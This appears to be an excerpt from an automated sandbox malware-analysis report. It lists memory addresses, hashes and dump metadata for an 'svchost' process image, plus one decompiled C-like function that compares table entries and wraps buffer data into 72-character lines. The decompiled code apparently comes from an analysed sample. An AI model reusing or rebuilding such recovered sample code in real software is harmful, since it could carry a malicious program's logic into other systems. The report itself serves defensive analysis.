                                                                                                                                                                                                                                                                      0x04016d38
                                                                                                                                                                                                                                                                      0x04016d58
                                                                                                                                                                                                                                                                      0x04016d78
                                                                                                                                                                                                                                                                      0x04016d98
                                                                                                                                                                                                                                                                      0x04016db8
                                                                                                                                                                                                                                                                      0x04016dd8
                                                                                                                                                                                                                                                                      0x04016df8
                                                                                                                                                                                                                                                                      0x04016e18
                                                                                                                                                                                                                                                                      0x04016e38
                                                                                                                                                                                                                                                                      0x04016e58
                                                                                                                                                                                                                                                                      0x04016e78
                                                                                                                                                                                                                                                                      0x04016e98
                                                                                                                                                                                                                                                                      0x04016eb8
                                                                                                                                                                                                                                                                      0x04016ed8
                                                                                                                                                                                                                                                                      0x04016ef5
                                                                                                                                                                                                                                                                      0x04016f12
                                                                                                                                                                                                                                                                      0x04016f2f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016f5a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016f43
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016f26
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016f09
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016eec
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016ecc
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016eac
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016e8c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016e6c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016e4c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016e2c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016e0c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016dec
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016dcc
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016dac
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016d8c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016d6c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016d4c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04016d2c
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _strcpy_s$_memset
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 987253425-0
                                                                                                                                                                                                                                                                      • Opcode ID: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                                      • Instruction ID: 6ffbbe254bd13291fa03b93f874eca1d4a54b98d90e1905f46e8f856855b0833
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC7172B6E04208FBDF50DF94EC818DEB7B4AB4A609F20C459F90976290D135BA48EB56
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                                                                                      			E040137A0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				short _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                                                                                      				char _v30;
                                                                                                                                                                                                                                                                      				short _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				char _v40;
                                                                                                                                                                                                                                                                      				short _v44;
                                                                                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				char _v74;
                                                                                                                                                                                                                                                                      				short _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				char _v88;
                                                                                                                                                                                                                                                                      				signed int _v92;
                                                                                                                                                                                                                                                                      				char _v96;
                                                                                                                                                                                                                                                                      				intOrPtr _v100;
                                                                                                                                                                                                                                                                      				intOrPtr _v104;
                                                                                                                                                                                                                                                                      				intOrPtr _v108;
                                                                                                                                                                                                                                                                      				intOrPtr _v112;
                                                                                                                                                                                                                                                                      				intOrPtr _v116;
                                                                                                                                                                                                                                                                      				intOrPtr _v120;
                                                                                                                                                                                                                                                                      				intOrPtr _v124;
                                                                                                                                                                                                                                                                      				intOrPtr _v128;
                                                                                                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                                                                                                      				intOrPtr _v136;
                                                                                                                                                                                                                                                                      				intOrPtr _v140;
                                                                                                                                                                                                                                                                      				intOrPtr _v144;
                                                                                                                                                                                                                                                                      				intOrPtr* _v148;
                                                                                                                                                                                                                                                                      				intOrPtr _v152;
                                                                                                                                                                                                                                                                      				intOrPtr _v156;
                                                                                                                                                                                                                                                                      				intOrPtr _v160;
                                                                                                                                                                                                                                                                      				intOrPtr _v164;
                                                                                                                                                                                                                                                                      				void* _t211;
                                                                                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                                                                                      				void* _t215;
                                                                                                                                                                                                                                                                      				signed int _t220;
                                                                                                                                                                                                                                                                      				intOrPtr _t226;
                                                                                                                                                                                                                                                                      				intOrPtr _t228;
                                                                                                                                                                                                                                                                      				intOrPtr _t251;
                                                                                                                                                                                                                                                                      				void* _t253;
                                                                                                                                                                                                                                                                      				intOrPtr _t258;
                                                                                                                                                                                                                                                                      				void* _t261;
                                                                                                                                                                                                                                                                      				intOrPtr _t266;
                                                                                                                                                                                                                                                                      				void* _t269;
                                                                                                                                                                                                                                                                      				signed int _t275;
                                                                                                                                                                                                                                                                      				void* _t277;
                                                                                                                                                                                                                                                                      				intOrPtr _t370;
                                                                                                                                                                                                                                                                      				void* _t373;
                                                                                                                                                                                                                                                                      				void* _t374;
                                                                                                                                                                                                                                                                      				signed int _t375;
                                                                                                                                                                                                                                                                      				void* _t376;
                                                                                                                                                                                                                                                                      				void* _t377;
                                                                                                                                                                                                                                                                      				void* _t378;
                                                                                                                                                                                                                                                                      				void* _t379;
                                                                                                                                                                                                                                                                      				void* _t380;
                                                                                                                                                                                                                                                                      				void* _t382;
                                                                                                                                                                                                                                                                      				void* _t384;
                                                                                                                                                                                                                                                                      				void* _t385;
                                                                                                                                                                                                                                                                      				void* _t386;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t374 = __esi;
                                                                                                                                                                                                                                                                      				_t373 = __edi;
                                                                                                                                                                                                                                                                      				_t277 = __ebx;
                                                                                                                                                                                                                                                                      				_v16 =  *0x429024 ^ _t375;
                                                                                                                                                                                                                                                                      				_v148 = __ecx;
                                                                                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                                                                                      				_v8 = 0x48;
                                                                                                                                                                                                                                                                      				_v48 =  *0x426ec4;
                                                                                                                                                                                                                                                                      				_v44 =  *0x426ec8;
                                                                                                                                                                                                                                                                      				_v28 =  *0x426ecc;
                                                                                                                                                                                                                                                                      				_v24 =  *0x426ed0;
                                                                                                                                                                                                                                                                      				_v20 =  *0x426ed4;
                                                                                                                                                                                                                                                                      				_v40 =  *0x426ed8;
                                                                                                                                                                                                                                                                      				_v36 =  *0x426edc;
                                                                                                                                                                                                                                                                      				_v32 =  *0x426ee0;
                                                                                                                                                                                                                                                                      				_v30 =  *0x426ee2;
                                                                                                                                                                                                                                                                      				while(_a4 != 0) {
                                                                                                                                                                                                                                                                      					_v52 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                                      					if(_v52 < 0) {
                                                                                                                                                                                                                                                                      						_v52 = 0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *_v148 + 0x2c)) > _v52) {
                                                                                                                                                                                                                                                                      						_v60 = 0xffffffff;
                                                                                                                                                                                                                                                                      						_v56 = 0;
                                                                                                                                                                                                                                                                      						_v56 = 0;
                                                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                                                      							_t334 = _v56;
                                                                                                                                                                                                                                                                      							if(_v56 >=  *((intOrPtr*)( *_v148 + 0x2c))) {
                                                                                                                                                                                                                                                                      								break;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t370 =  *((intOrPtr*)( *_v148 + 0x28));
                                                                                                                                                                                                                                                                      							_t275 = _v56;
                                                                                                                                                                                                                                                                      							_t334 =  *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4))));
                                                                                                                                                                                                                                                                      							if( *((intOrPtr*)( *((intOrPtr*)(_t370 + _t275 * 4)))) != _v52) {
                                                                                                                                                                                                                                                                      								_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v60 = _v56;
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						if(_v60 >= 0) {
                                                                                                                                                                                                                                                                      							_t211 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v48, 1);
                                                                                                                                                                                                                                                                      							_t377 = _t376 + 0xc;
                                                                                                                                                                                                                                                                      							if(_t211 == 0) {
                                                                                                                                                                                                                                                                      								_t213 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v28, 1);
                                                                                                                                                                                                                                                                      								_t378 = _t377 + 0xc;
                                                                                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                                                                                      									_t215 = E0401E5C0( *((intOrPtr*)(_a4 + 4)),  &_v40, 1);
                                                                                                                                                                                                                                                                      									_t379 = _t378 + 0xc;
                                                                                                                                                                                                                                                                      									if(_t215 == 0) {
                                                                                                                                                                                                                                                                      										_v96 = 0;
                                                                                                                                                                                                                                                                      										_t220 = E0401EA00(_t373,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x10)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 0x14)),  &_v96);
                                                                                                                                                                                                                                                                      										_t376 = _t379 + 0xc;
                                                                                                                                                                                                                                                                      										_v92 = _t220;
                                                                                                                                                                                                                                                                      										if(_v96 == 0 || _v92 <= 0) {
                                                                                                                                                                                                                                                                      											L49:
                                                                                                                                                                                                                                                                      											_t334 = 0;
                                                                                                                                                                                                                                                                      											if(0 != 0) {
                                                                                                                                                                                                                                                                      												continue;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											goto L50;
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											asm("cdq");
                                                                                                                                                                                                                                                                      											_v100 = _v92 + _v92 / 0x48 * 2;
                                                                                                                                                                                                                                                                      											_t226 = E04020CE0(_v100);
                                                                                                                                                                                                                                                                      											_t380 = _t376 + 4;
                                                                                                                                                                                                                                                                      											_v132 = _t226;
                                                                                                                                                                                                                                                                      											_v104 = _v132;
                                                                                                                                                                                                                                                                      											_v56 = 0;
                                                                                                                                                                                                                                                                      											_v108 = 0;
                                                                                                                                                                                                                                                                      											while(_v56 < _v92) {
                                                                                                                                                                                                                                                                      												if(_v56 > 0) {
                                                                                                                                                                                                                                                                      													asm("cdq");
                                                                                                                                                                                                                                                                      													if(_v56 % 0x48 == 0) {
                                                                                                                                                                                                                                                                      														 *((char*)(_v104 + _v108)) = 0xd;
                                                                                                                                                                                                                                                                      														 *((char*)(_v104 + _v108 + 1)) = 0xa;
                                                                                                                                                                                                                                                                      														_v108 = _v108 + 2;
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												 *((char*)(_v104 + _v108)) =  *((intOrPtr*)(_v96 + _v56));
                                                                                                                                                                                                                                                                      												_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                      												_v108 = _v108 + 1;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_t228 = E04020CE0(8);
                                                                                                                                                                                                                                                                      											_t376 = _t380 + 4;
                                                                                                                                                                                                                                                                      											_v136 = _t228;
                                                                                                                                                                                                                                                                      											if(_v136 == 0) {
                                                                                                                                                                                                                                                                      												_v164 = 0;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												_v164 = E0401F4E0(_v136);
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_v12 = _v164;
                                                                                                                                                                                                                                                                      											E0401FC90(_t277, _v12, _t373, _t374, _v104, _v100);
                                                                                                                                                                                                                                                                      											if(_v104 != 0) {
                                                                                                                                                                                                                                                                      												_v140 = _v104;
                                                                                                                                                                                                                                                                      												E04020CC0(_v140);
                                                                                                                                                                                                                                                                      												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                      												_v104 = 0x666;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											if(_v96 != 0) {
                                                                                                                                                                                                                                                                      												_v144 = _v96;
                                                                                                                                                                                                                                                                      												E04020CC0(_v144);
                                                                                                                                                                                                                                                                      												_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                      												_v96 = 0x666;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											goto L49;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v88 =  *0x426ee4;
                                                                                                                                                                                                                                                                      									_v84 =  *0x426ee8;
                                                                                                                                                                                                                                                                      									_v80 =  *0x426eec;
                                                                                                                                                                                                                                                                      									_v76 =  *0x426ef0;
                                                                                                                                                                                                                                                                      									_v74 =  *0x426ef2;
                                                                                                                                                                                                                                                                      									_v64 = 0x1a;
                                                                                                                                                                                                                                                                      									_v120 = E04020CE0(_v64);
                                                                                                                                                                                                                                                                      									_v72 = _v120;
                                                                                                                                                                                                                                                                      									E04007010(_t373, _v72, 0, _v64);
                                                                                                                                                                                                                                                                      									_t382 = _t379 + 0x10;
                                                                                                                                                                                                                                                                      									_v68 =  *((intOrPtr*)(_v148 + 0x10));
                                                                                                                                                                                                                                                                      									if(_v68 < 0) {
                                                                                                                                                                                                                                                                      										_v68 = 0;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									 *0x4251f8(_v72, _v64 - 1,  &_v88, _v68);
                                                                                                                                                                                                                                                                      									_t251 = E04020CE0(8);
                                                                                                                                                                                                                                                                      									_t384 = _t382 + 0x14;
                                                                                                                                                                                                                                                                      									_v124 = _t251;
                                                                                                                                                                                                                                                                      									if(_v124 == 0) {
                                                                                                                                                                                                                                                                      										_v160 = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_v160 = E0401F4E0(_v124);
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v12 = _v160;
                                                                                                                                                                                                                                                                      									_t253 = E040070A0(_v72);
                                                                                                                                                                                                                                                                      									_t376 = _t384 + 4;
                                                                                                                                                                                                                                                                      									E0401FC90(_t277, _v12, _t373, _t374, _v72, _t253);
                                                                                                                                                                                                                                                                      									if(_v72 != 0) {
                                                                                                                                                                                                                                                                      										_v128 = _v72;
                                                                                                                                                                                                                                                                      										E04020CC0(_v128);
                                                                                                                                                                                                                                                                      										_t376 = _t376 + 4;
                                                                                                                                                                                                                                                                      										_v72 = 0x666;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									goto L49;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_t258 = E04020CE0(8);
                                                                                                                                                                                                                                                                      								_t385 = _t378 + 4;
                                                                                                                                                                                                                                                                      								_v116 = _t258;
                                                                                                                                                                                                                                                                      								if(_v116 == 0) {
                                                                                                                                                                                                                                                                      									_v156 = 0;
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									_v156 = E0401F4E0(_v116);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v12 = _v156;
                                                                                                                                                                                                                                                                      								_t261 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)));
                                                                                                                                                                                                                                                                      								_t376 = _t385 + 4;
                                                                                                                                                                                                                                                                      								E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 8)), _t261);
                                                                                                                                                                                                                                                                      								goto L49;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_t266 = E04020CE0(8);
                                                                                                                                                                                                                                                                      							_t386 = _t377 + 4;
                                                                                                                                                                                                                                                                      							_v112 = _t266;
                                                                                                                                                                                                                                                                      							if(_v112 == 0) {
                                                                                                                                                                                                                                                                      								_v152 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v152 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v12 = _v152;
                                                                                                                                                                                                                                                                      							_t269 = E040070A0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)));
                                                                                                                                                                                                                                                                      							_t376 = _t386 + 4;
                                                                                                                                                                                                                                                                      							E0401FC90(_t277, _v12, _t373, _t374,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x28)) + _v60 * 4)) + 4)), _t269);
                                                                                                                                                                                                                                                                      							goto L49;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						goto L50;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						L50:
                                                                                                                                                                                                                                                                      						return E04006C8C(_v12, _t277, _v16 ^ _t375, _t334, _t373, _t374);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L50;
                                                                                                                                                                                                                                                                      			}








































































                                                                                                                                                                                                                                                                      0x040137a0
                                                                                                                                                                                                                                                                      0x040137a0
                                                                                                                                                                                                                                                                      0x040137a0
                                                                                                                                                                                                                                                                      0x040137b0
                                                                                                                                                                                                                                                                      0x040137b3
                                                                                                                                                                                                                                                                      0x040137b9
                                                                                                                                                                                                                                                                      0x040137c0
                                                                                                                                                                                                                                                                      0x040137cc
                                                                                                                                                                                                                                                                      0x040137d6
                                                                                                                                                                                                                                                                      0x040137e0
                                                                                                                                                                                                                                                                      0x040137e8
                                                                                                                                                                                                                                                                      0x040137f2
                                                                                                                                                                                                                                                                      0x040137fc
                                                                                                                                                                                                                                                                      0x04013804
                                                                                                                                                                                                                                                                      0x0401380e
                                                                                                                                                                                                                                                                      0x04013818
                                                                                                                                                                                                                                                                      0x0401381b
                                                                                                                                                                                                                                                                      0x0401382f
                                                                                                                                                                                                                                                                      0x04013836
                                                                                                                                                                                                                                                                      0x04013838
                                                                                                                                                                                                                                                                      0x04013838
                                                                                                                                                                                                                                                                      0x0401384d
                                                                                                                                                                                                                                                                      0x04013854
                                                                                                                                                                                                                                                                      0x0401385b
                                                                                                                                                                                                                                                                      0x04013862
                                                                                                                                                                                                                                                                      0x04013874
                                                                                                                                                                                                                                                                      0x0401387c
                                                                                                                                                                                                                                                                      0x04013882
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401388c
                                                                                                                                                                                                                                                                      0x0401388f
                                                                                                                                                                                                                                                                      0x04013895
                                                                                                                                                                                                                                                                      0x0401389a
                                                                                                                                                                                                                                                                      0x04013871
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013871
                                                                                                                                                                                                                                                                      0x0401389f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401389f
                                                                                                                                                                                                                                                                      0x040138aa
                                                                                                                                                                                                                                                                      0x040138be
                                                                                                                                                                                                                                                                      0x040138c3
                                                                                                                                                                                                                                                                      0x040138c8
                                                                                                                                                                                                                                                                      0x0401394d
                                                                                                                                                                                                                                                                      0x04013952
                                                                                                                                                                                                                                                                      0x04013957
                                                                                                                                                                                                                                                                      0x040139dc
                                                                                                                                                                                                                                                                      0x040139e1
                                                                                                                                                                                                                                                                      0x040139e6
                                                                                                                                                                                                                                                                      0x04013aef
                                                                                                                                                                                                                                                                      0x04013b24
                                                                                                                                                                                                                                                                      0x04013b29
                                                                                                                                                                                                                                                                      0x04013b2c
                                                                                                                                                                                                                                                                      0x04013b33
                                                                                                                                                                                                                                                                      0x04013c70
                                                                                                                                                                                                                                                                      0x04013c70
                                                                                                                                                                                                                                                                      0x04013c72
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013b43
                                                                                                                                                                                                                                                                      0x04013b46
                                                                                                                                                                                                                                                                      0x04013b54
                                                                                                                                                                                                                                                                      0x04013b5b
                                                                                                                                                                                                                                                                      0x04013b60
                                                                                                                                                                                                                                                                      0x04013b63
                                                                                                                                                                                                                                                                      0x04013b69
                                                                                                                                                                                                                                                                      0x04013b6c
                                                                                                                                                                                                                                                                      0x04013b73
                                                                                                                                                                                                                                                                      0x04013b7a
                                                                                                                                                                                                                                                                      0x04013b86
                                                                                                                                                                                                                                                                      0x04013b8b
                                                                                                                                                                                                                                                                      0x04013b95
                                                                                                                                                                                                                                                                      0x04013b9d
                                                                                                                                                                                                                                                                      0x04013ba6
                                                                                                                                                                                                                                                                      0x04013bb0
                                                                                                                                                                                                                                                                      0x04013bb0
                                                                                                                                                                                                                                                                      0x04013b95
                                                                                                                                                                                                                                                                      0x04013bc1
                                                                                                                                                                                                                                                                      0x04013bc9
                                                                                                                                                                                                                                                                      0x04013bd2
                                                                                                                                                                                                                                                                      0x04013bd2
                                                                                                                                                                                                                                                                      0x04013bd9
                                                                                                                                                                                                                                                                      0x04013bde
                                                                                                                                                                                                                                                                      0x04013be1
                                                                                                                                                                                                                                                                      0x04013bee
                                                                                                                                                                                                                                                                      0x04013c03
                                                                                                                                                                                                                                                                      0x04013bf0
                                                                                                                                                                                                                                                                      0x04013bfb
                                                                                                                                                                                                                                                                      0x04013bfb
                                                                                                                                                                                                                                                                      0x04013c13
                                                                                                                                                                                                                                                                      0x04013c21
                                                                                                                                                                                                                                                                      0x04013c2a
                                                                                                                                                                                                                                                                      0x04013c2f
                                                                                                                                                                                                                                                                      0x04013c3c
                                                                                                                                                                                                                                                                      0x04013c41
                                                                                                                                                                                                                                                                      0x04013c44
                                                                                                                                                                                                                                                                      0x04013c44
                                                                                                                                                                                                                                                                      0x04013c4f
                                                                                                                                                                                                                                                                      0x04013c54
                                                                                                                                                                                                                                                                      0x04013c61
                                                                                                                                                                                                                                                                      0x04013c66
                                                                                                                                                                                                                                                                      0x04013c69
                                                                                                                                                                                                                                                                      0x04013c69
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013c4f
                                                                                                                                                                                                                                                                      0x04013b33
                                                                                                                                                                                                                                                                      0x040139f1
                                                                                                                                                                                                                                                                      0x040139fa
                                                                                                                                                                                                                                                                      0x04013a03
                                                                                                                                                                                                                                                                      0x04013a0c
                                                                                                                                                                                                                                                                      0x04013a16
                                                                                                                                                                                                                                                                      0x04013a19
                                                                                                                                                                                                                                                                      0x04013a2c
                                                                                                                                                                                                                                                                      0x04013a32
                                                                                                                                                                                                                                                                      0x04013a3f
                                                                                                                                                                                                                                                                      0x04013a44
                                                                                                                                                                                                                                                                      0x04013a50
                                                                                                                                                                                                                                                                      0x04013a57
                                                                                                                                                                                                                                                                      0x04013a59
                                                                                                                                                                                                                                                                      0x04013a59
                                                                                                                                                                                                                                                                      0x04013a73
                                                                                                                                                                                                                                                                      0x04013a7e
                                                                                                                                                                                                                                                                      0x04013a83
                                                                                                                                                                                                                                                                      0x04013a86
                                                                                                                                                                                                                                                                      0x04013a8d
                                                                                                                                                                                                                                                                      0x04013a9f
                                                                                                                                                                                                                                                                      0x04013a8f
                                                                                                                                                                                                                                                                      0x04013a97
                                                                                                                                                                                                                                                                      0x04013a97
                                                                                                                                                                                                                                                                      0x04013aaf
                                                                                                                                                                                                                                                                      0x04013ab6
                                                                                                                                                                                                                                                                      0x04013abb
                                                                                                                                                                                                                                                                      0x04013ac6
                                                                                                                                                                                                                                                                      0x04013acf
                                                                                                                                                                                                                                                                      0x04013ad4
                                                                                                                                                                                                                                                                      0x04013adb
                                                                                                                                                                                                                                                                      0x04013ae0
                                                                                                                                                                                                                                                                      0x04013ae3
                                                                                                                                                                                                                                                                      0x04013ae3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013aea
                                                                                                                                                                                                                                                                      0x0401395b
                                                                                                                                                                                                                                                                      0x04013960
                                                                                                                                                                                                                                                                      0x04013963
                                                                                                                                                                                                                                                                      0x0401396a
                                                                                                                                                                                                                                                                      0x0401397c
                                                                                                                                                                                                                                                                      0x0401396c
                                                                                                                                                                                                                                                                      0x04013974
                                                                                                                                                                                                                                                                      0x04013974
                                                                                                                                                                                                                                                                      0x0401398c
                                                                                                                                                                                                                                                                      0x040139a4
                                                                                                                                                                                                                                                                      0x040139a9
                                                                                                                                                                                                                                                                      0x040139c5
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x040139c5
                                                                                                                                                                                                                                                                      0x040138cc
                                                                                                                                                                                                                                                                      0x040138d1
                                                                                                                                                                                                                                                                      0x040138d4
                                                                                                                                                                                                                                                                      0x040138db
                                                                                                                                                                                                                                                                      0x040138ed
                                                                                                                                                                                                                                                                      0x040138dd
                                                                                                                                                                                                                                                                      0x040138e5
                                                                                                                                                                                                                                                                      0x040138e5
                                                                                                                                                                                                                                                                      0x040138fd
                                                                                                                                                                                                                                                                      0x04013915
                                                                                                                                                                                                                                                                      0x0401391a
                                                                                                                                                                                                                                                                      0x04013936
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013936
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401384f
                                                                                                                                                                                                                                                                      0x04013c78
                                                                                                                                                                                                                                                                      0x04013c88
                                                                                                                                                                                                                                                                      0x04013c88
                                                                                                                                                                                                                                                                      0x0401384d
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                                      • API String ID: 0-2852464175
                                                                                                                                                                                                                                                                      • Opcode ID: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                                      • Instruction ID: 67b441bc6219ad25058a7dc751711c58666b968fd0b66db19d5699bc980d0709
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FF119B8E00218DFEB14DFA8D990B9DB7B1FF48308F248199D909AB361D771A985CF41
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
